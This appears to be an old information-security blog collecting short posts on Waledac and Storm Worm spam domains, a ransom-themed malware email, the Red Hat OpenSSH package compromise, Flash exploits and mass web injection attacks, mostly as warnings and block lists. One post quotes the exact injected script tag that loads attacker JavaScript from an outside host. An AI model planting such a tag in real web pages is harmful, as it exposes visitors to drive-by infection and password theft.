SecurityZone.org - Information Security Blog

Just put up a new post on the Shadowserver page on July 4th/Independence day spam campaign activity.. it includes several new domains:

http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090704

Just a quick post on some of the newer Waledac domains. The following were registered on February 4, 2009:

adoresong.com
alldatanow.com
alldataworld.com
bestlovehelp.com
cantlosedata.com
chatloveonline.com
cherishletter.com
cherishpoems.com
freedoconline.com
losenowfast.com
lovecentralonline.com
lovelifeportal.com
mingwater.com
theworldpool.com
wagerpond.com
whocherish.com
worldlovelife.com
worshiplove.com
yourdatabank.com
yourteamdoc.com

These have been updated and added to the list on the Shadowserver site at:

http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt

Steven

Got the full list also being updated and posted on the Shadowserver website at the following URL:

http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt

However, just wanted to reiterate to people that you should block all of these domains:

Registered January 23, 2009:

adorelyric.com
adorepoem.com
adoresongs.com
bestadore.com
bestlovelong.com
funloveonline.com
youradore.com
yourgreatlove.com

Registered January 19, 2009:

bestgoodnews.com
goodnewsdigital.com
goodnewsreview.com
linkworldnews.com
reportradio.com
spacemynews.com
wapcitynews.com
worldnewsdot.com
worldnewseye.com
worldtracknews.com

Registered January 15, 2009:

bestbarack.com
bestbaracksite.com
bestobamadirect.com
expowale.com
greatbarackguide.com
greatobamaguide.com
greatobamaonline.com
jobarack.com
superobamadirect.com
superobamaonline.com
thebaracksite.com
topwale.com
waledirekt.com
waleonline.com
waleprojekt.com

Older:

bestchristmascard.com
bestmirabella.com
bestyearcard.com
blackchristmascard.com
cardnewyear.com
cheapdecember.com
christmaslightsnow.com
decemberchristmas.com
directchristmasgift.com
eternalgreetingcard.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
greatmirabellasite.com
greetingcardcalendar.com
greetingcardgarb.com
greetingguide.com
greetingsupersite.com
holidayxmas.com
itsfatherchristmas.com
justchristmasgift.com
lifegreetingcard.com
livechristmascard.com
livechristmasgift.com
mirabellaclub.com
mirabellamotors.com
mirabellanews.com
mirabellaonline.com
newlifeyearsite.com
newmediayearguide.com
newyearcardcompany.com
newyearcardfree.com
newyearcardonline.com
newyearcardservice.com
smartcardgreeting.com
superchristmasday.com
superchristmaslights.com
superyearcard.com
themirabelladirect.com
themirabellaguide.com
themirabellahome.com
topgreetingsite.com
whitewhitechristmas.com
worldgreetingcard.com
yourchristmaslights.com
yourdecember.com
yourmirabelladirect.com
yourregards.com
youryearcard.com

Waledac Exploit Domain List:

googol-analisys.com
seocom.name
seocom.mobi
seofon.net

—-

Also, if you are interested in all things Waledac (omghi2u!), check our Jeremy’s Waledac tracker here:

http://sudosecure.net/waledac/

I just got a humorous Spam message that someone else told me about earlier. Apparently it’s supposed to have some sort of Virus attached to it. Only it seems my copy has been made a bit safer. The Spam message looks a little something like this:

Subject: We have hijacked your baby

Body:

Hey We have hijacked your baby but you must pay once to us $50 000. The details we will send later…

We has attached photo of your fume

Funny topic and bad grammar all make for a good virus/spam campaign. However, you might be wondering if I am nervous about receiving such an e-mail? Well, e-mail never really makes me nervous and then again I also don’t have a baby. Although I think I would be concerned if I had a baby and someone “hijacked” it. It seems my message got nibbled on by “MIMEDefang”, which was a bit disappointing since I wanted to see the attachment. I wanted to see if the trojan included a picture of a baby or not. I guess I’ll have to wait in suspense until someone shares a copy with me.

Feel free to drop me a line with a copy of this e-mail if you have it intact - steven [at] securityzone [dot] org

Update: 11:40 PM

Got a copy of the e-mail with the attachment in place. Sorry no picture but there is an attachment called “photo.zip” that has “photo.exe” inside of it. File MD5 for the .exe is 807efe034e50327234e83bc9e6a94b32.

This is a piece of malware which then downloads more malware from the known malicious website reddii.org. Stay away from these e-mails and that domain.

Woops! It looks like multiple servers by the Red Hat and Fedora projects were compromised last week. It’s always unfortunate when this sort of stuff happens, especially when the hackers make modifications to the SSH packages. Fortunately the issue only affects a few versions of the packages and only existed for a short time. There have been various announcements and mailing list postings on this issue that can be viewed here and here.

Potential affected OS versions that may have received these updates:

Red Hat Desktop (v. 4)
Red Hat Enterprise Linux (v. 5 server)
Red Hat Enterprise Linux AS (v. 4)
Red Hat Enterprise Linux AS (v. 4.5.z)
Red Hat Enterprise Linux Desktop (v. 5 client)
Red Hat Enterprise Linux ES (v. 4)
Red Hat Enterprise Linux ES (v. 4.5.z)
Red Hat Enterprise Linux WS (v. 4)

You can grab the OpenSSH blacklist script from the Red Hat website by clicking here. This script can be run by a non-privileged users to check if the OS has any of the listed malicious packages.

It appears there are now Adobe Flash vulnerabilities live and in the wild on several sites. This is not good considering some of the websites involved in the recent mass SQL injection attacks are aiming to exploit this vulnerability. Basically, if you can’t recall upgrading flash recently, you probably need to go ahead and do it.

You can check your current flash version by clicking here.

You can upgrade to the latest version of flash by clicking here.

Don’t wait - just upgrade right now!

It appears that in addition to “supersameas.com”, the Storm Worm is now using and spamming itself out with several new domain names. These domain names are all with Chinese registrars and have been around since at least February but are just now starting to be used. In addition to serving up the executables for download, they are also attempting fire exploits at users that have the Internet Explorer browser. It is highly recommended that you do NOT visit these domains. Here is the list that is currently active:

biggetonething.cn
gasperoblue.cn
giftapplys.cn
gribontruck.cn
limpodrift.cn
loveinlive.cn
newoneforyou.cn
normocock.cn
orthelike.com
supersameas.com
thingforyoutoo.cn

They are coming through via e-mail as always and continuing their assault against Blogger (blogspot.com) sites. Searching Google shows the standard “love” related campaign. However, there is at least one result on Google showing politically motivated e-mails that are being sent as well. At least one Spam reported on the Google group “news.admin.net-abuse.sightings” shows an e-mail with the subject “Cowen confirmed as next Irish premier Options” and a body of “Police fire on protesters in Nepal” followed by a link to one of the above domains.

If you visit these sites with IE, you will quickly find yourself being attacked via different ActiveX objects. The first set of exploits will attempt to download “load.exe” to the system. It will then ultimately redirect the visitor to “flow.php” which is full of obfuscated JavaScript. It is recommended that you block the above domain names and do not visit them.

There’s a new round of Storm Worm e-mails going around taking advantage of our favorite technique, showing people what looks like a video and telling them they’re missing a codec to view it. Only these guys are using a rather blunt name for the files this time: StormCodec.exe and StormCodec8.exe - Not very subtle for the “Storm” Worm.

Users are lured this time by e-mail that wants them to visit the fast-flux domain “supersameas.com“. You can protect yourself and your organization at this juncture by blocking this domain. Once on the site there is a video looking image in the middle with the following message:

The video and download links point to the aforementioned files. Tip: You don’t want Storm Codec on your PC! Thanks to Jose from Arbor Networks for pointing out the update to me, otherwise I probably wouldn’t have noticed this until much later.

You might have received some e-mails in the last few hours that link to some strange looking blogspot.com pages. A recent example I received a few hours ago pointed me to hxxp://aflmdiovanrd.blogspot.com/. The webpage then wants you to click to download files named “love.exe” or “withlove.exe“, as previously seen with the Valentine’s Day Storm Worm attack.

They are now using a new domain name for their fast-flux network. Each of these URLs presently links to “superdrugtesting.com” followed by the aforementioned binary names. They haven’t used an actual domain name or Google’s Blogger service with these attacks since the Christmas/New Year time frame. Looks like they are back at it again with a new technique.

Here’s a screen shot of what the page looks like:

Be on the look out for these e-mails and consider blocking “superdrugtesting.com” from your networks if possible. Since this domain name is part of a fast-flux network, you must block it by the domain and not IP address as there are thousands of them.

Edit: Let me add that if you were infected with this run of the Storm Worm or the recent Valentine’s Day campaign they did, you would most likely have “aromis.exe” running in your taskbar (not hidden this time) and it will reside in your root WINDOWS folder.

Hello all that find this page. I’d like to see if I could at least try and clear up some confusion for a few of you out there. There has been a lot of coverage over the last few days on two completely different attacks that some how end being linked together. We will look at both issues, describe them, and show how these attacks are not the same.

Chinese JavaScript Injection Attack

Over the past ten days or so, the following code has found its way into the actual source code of several thousand web pages:

<script src=http://www.2117966.net/fuckjp.js></script>

This JavaScript would attempt to do several things and load other files that would attempt to exploit the visitor. With this attack there are *NO* iframe tags involved. Just take a look at the above line of code and is exactly what was injected. This is almost indentical to the “uc8010.com” attacks a few months ago. In fact, we were able to find a few pages that appear to have had the line of code above injected right into the middle of where it used to refer to uc8010.com. In my opinion it looks very similar but seems to have different goals. In any event, if you get malware from the latest go around of these attacks, they will being stealing your passwords that you send with Internet Explorer.

An interesting side note worth mention is that Trend Micro’s own website was hit with this attack. They had several pages that can still be viewed in Google’s cache that were injected with the above script. It just goes to show this kind of unfortunate stuff can happen to anyone.

IFrame Injection Attack

The other attack that is getting a lot of attention is one that’s labeled an IFrame injection attack. However, in these instance the websites themselves are NOT actually hacked. Rather there is a lack of input validation and the attackers are able to cache search results involving links to malicious websites through an IFrame. In theory they could have just as easily put a JavaScript reference. It just happens they used an IFrame in their search terms that get cached. The websites themselves have not been compromised (i.e. if you just legitimately browsed on the website, you would not find yourself under attack). It appears some of them are attempting to exploit vulnerabilities in the user’s system and others are presenting them with fake errors about needing video codec. From what I have seen and what has been reported, the Zlob trojan is the target install for a lot or most of this stuff. You can read some more information and see examples of this at http://ddanchev.blogspot.com/.

Conclusion

As you can see, these are completely unrelated attacks. Other than the fact they involve the Internet and getting malware on a user’s system, there is really no other correlation. However, either group behind both attacks could easily use the techniques of the other, as could any other group. We have seen some interesting tricks from the bad guys lately. We’ll have to see what they come up with next.

Steven